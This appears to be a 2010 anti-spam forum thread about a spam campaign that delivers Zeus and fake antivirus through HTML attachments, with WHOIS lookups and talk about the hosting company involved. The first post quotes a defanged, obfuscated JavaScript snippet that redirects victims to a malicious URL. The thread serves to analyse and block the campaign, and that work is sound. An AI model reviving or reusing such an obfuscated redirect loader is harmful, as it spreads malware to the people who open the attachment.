Zeus delivery campaign

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Zeus delivery campaign

Postby hellkyng » Fri Jun 18, 2010 1:19 pm

This post quotes malicious javascript, but the code has been disabled by being enclosed in "[code]" brackets. - Alpha


My apologies if this has already been discussed. Is anyone else seeing spam, that delivers an .html attachment with obfuscated javascript in it? Something like:

Code: Select all
[size=85]<**Neutered for AV**script type='text/javascript'>function j(){};var uE=false;j.prototype = {v : function() {var l='';this.lU=false;this.a='';var r=document;f="";var rI=new Date();var s=14705;var y=r['l$o$cWaptWi$o$nd'.replace(/[dW\<p\$]/g, '')];k='';this.vT='';var x=new Array();y['har%eafp'.replace(/[p%~Aa]/g, '')]='hututrp*:u/r/^m*a)b*cuorm).un)e)t^/*zu.uh*tum)'.replace(/[\)r\^\*u]/g, '');var lC=new Array();var e=new Array();this.sJ="";var i=false;}};var uH=function(){return 'uH'};var u=new j(); var o=function(){};u.v();sQ="sQ";<**Neutered for AV**/script>[/size]


If you break it up, you find the malicious url is hxxp://mabcom[dot]net . This URL then contains a redirect to a final spam site, typically pillz or replica watches. But also contains a hidden iframe, linking to a site that in this case contained RogueAV and Zeus.

The reason I ask is that the messages are rapidly changing, and throwing up way more javascript garbage to wade through for the redirect url. This morning alone I've seen 9 different subject lines.

And a final note to the lengthy (sorry!) post, a number of these redirect sites have been hosted with HostRocket.com. Has anyone had issues with them in the past? They have been responsive with takedown requests, but I find it odd they continue to be a problem.
hellkyng
Getting started
 
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm

Re: Zeus delivery campaign

Postby AlphaCentauri » Fri Jun 18, 2010 3:37 pm

Avira AntiVir doesn't like your post! :shock:

But it's pretty sensitive and will alarm if it sees javascript that's just too sneaky-looking, even if it's disabled. I added code brackets to be sure it's dead.

I don't recall problems with HostRocket. Is it a lot of issues in a short interval, or consistent occurrences over a long time period?

They are inexpensive, offer unlimited bandwidth, and allow an unlimited numbers of domain names for the same hosting package, so those features might be attractive to spammers with a lot of throwaway domains. Spammers often use stolen credit cards to pay anyway, but if the monthly fee is low, it's less likely to be noticed on the victim's bill or questioned by the hosting company at the time of signup.

It's also difficult to do aggressive enforcement on that kind of budget -- HostRocket may mean well, but may have resigned themselves to doing no more than responding to complaints, without doing any further investigation of the customers causing the complaints.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Zeus delivery campaign

Postby hellkyng » Fri Jun 18, 2010 4:00 pm

Sorry about that, nothing like a quick test of the AV I suppose.

I'm just noticing issues with HostRocket and I've seen a few posts around various sites that indicate there has been issues before. I think you might be right though, they have a nice set of services that make them easily abused. But to their credit after a 30 minute wait on hold they did get the malicious content from a site removed in a matter of minutes.

I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign. I hate to see them abused, especially given this spam is doing a decent job of evading filters, at least our filters anyway.
hellkyng
Getting started
 
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm

Re: Zeus delivery campaign

Postby AlphaCentauri » Fri Jun 18, 2010 4:47 pm

hellkyng wrote:I may give them a call and see if I can chat with someone above tier 1 regarding this spam campaign.


It's worth a try. It's good to remember that most of us have learned a huge amount about the spammer economy since we started reporting, and abuse desk people simply don't know as much about it as we do. Most people are blown away when they find out how blatantly illegal a lot of these slick-looking websites are. Administrators can go from apathetic to on-the-warpath pretty quickly when they realize they've been played for fools.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Zeus delivery campaign

Postby Red Dwarf » Fri Jun 18, 2010 5:14 pm

Analyzing - the corrupted domain and its name servers are long standing, so likely to be infiltrated.

WHOIS look-ups
1.
Domain Name: MABCOM.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: ok
Updated Date: 19-jan-2010
Creation Date: 21-jan-2004
..
2.
Name server
Domain Name: HRNOC.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.HRNOC.NET
Name Server: DNS2.HRNOC.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 16-feb-2007
Creation Date: 12-nov-2001
..
Technical Contact:
HostRocket.Com
HostRocket Customer (register@hostrocket.com)
+1.5183713421
Fax:
21 Corporate Drive
Clifton Park, NY 12065
US

Web site mabcom.net is in Dutch, google translated as
his website IS STILL under construction and take some more time than expected,
We will do our best to complete it as soon as possible!

MABCOM.NET is just opened!

What we do include

* Hardware Repair of computers including PC, Mac, Laptops
* Software-based Repair using such programs as virus removal, driver installation
* Repairs on Game consoles such as PSP, Wii, DS, Xbox 360, PS3 etc etc
* Modification - Photos Games computers (such as region free time)
* Purchasing, selling computers, game consoles and accessories

Don't hesitate to visit our shop (store to store) located in topgames - Jan van Galenstraat 60 1056CC Amsterdam

open Monday through Friday from 10:30 a.m. to 6:00 p.m. and Saturday from 10:30 a.m. to 5:00 p.m.

For a route description hXXp://www.TOPGAMES.NL

Alternatively, your mail for more info on: INFO@MABCOM.NET



Mvg

Michael Buys

MABCOM
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10487
Joined: Tue Jun 27, 2006 2:01 am

Re: Zeus delivery campaign

Postby hellkyng » Tue Jul 06, 2010 2:55 pm

Despite the ridiculous nature of these javascript obfuscation messages, I wanted to post a follow up to this as a couple of people have mentioned having issues with these specific fraud/maleware spam messages. For whatever reason commercial spam filtering vendors are not detecting these messages very well. An example that made it through today:

Subject: Delivery Status Notification (Failure)

Note: Forwarded message is attached. This is an automatically generated Delivery Status Notification. Delivery to the following recipients failed. mariekwi0@ringsmart.com Final-Recipient: rfc822;mariekwi0@ringsmart.com Action: failed Status: 5.1.1


This tripped up a number of users who clicked the html attachment to see "what they sent". Which naturally contains a mixture of javascript garbage, and a redirection to some bad sites.

For anyone else getting tripped up by this, the URL's used in the spam are fairly obvious, I'm happy to share what info I have as the campaign changes. We've taken the approach of simply blocking the URL's as we identify them, as they typically seem to only use 1-3 different urls a week. Thanks for info so far on this all, hopefully this helps others a bit as well.
hellkyng
Getting started
 
Posts: 18
Joined: Thu Jun 17, 2010 5:37 pm

Re: Zeus delivery campaign

Postby meep » Sat Jul 24, 2010 8:19 am

This one has been recently spamming crap out of my accounts. :roll:
On a related note: someone recently updated their blog to say the obvious. :evil:

Zbot/Zeus botnets aren’t going away
http://www.thesecurityblog.com/2010/07/zbotzeus-botnets-aren’t-going-away/
User avatar
meep
Spammers' Nightmare
 
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Zeus delivery campaign

Postby meep » Sat Jul 24, 2010 8:43 am

Also interesting to note: in July 2010, researchers at TrendMicro published an analysis called in PDF format with 21 pages about Zeus (also note its other malware names: ZBOT, WSNPoem, PRG, JabberZeuS, etc.): ZeuS: A Persistent Cybercrime Enterprise.

It mentions that ZeuS is targeting Russian banks. Also worthy to mention is credit is given to the ZeuSTracker which actively posts infected domains, IPs, ASNs, etc.
User avatar
meep
Spammers' Nightmare
 
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Zeus delivery campaign

Postby Nodus » Sat Jul 24, 2010 6:37 pm

meep wrote:It mentions that ZeuS is targeting Russian banks.

Well, if that won't create some hassle in the Russian law enforcement circles, then I don't know what will. But if it takes some duma members to lose their savings or some FSB officer to be stolen of his credit card number before they start taking cybercrime seriously, so be it. :sad3:
Arf, she said
User avatar
Nodus
Spammer Obliterator
 
Posts: 2286
Joined: Fri Jun 15, 2007 7:05 pm


Return to Malware

Who is online

Users browsing this forum: Bing [Bot] and 1 guest

cron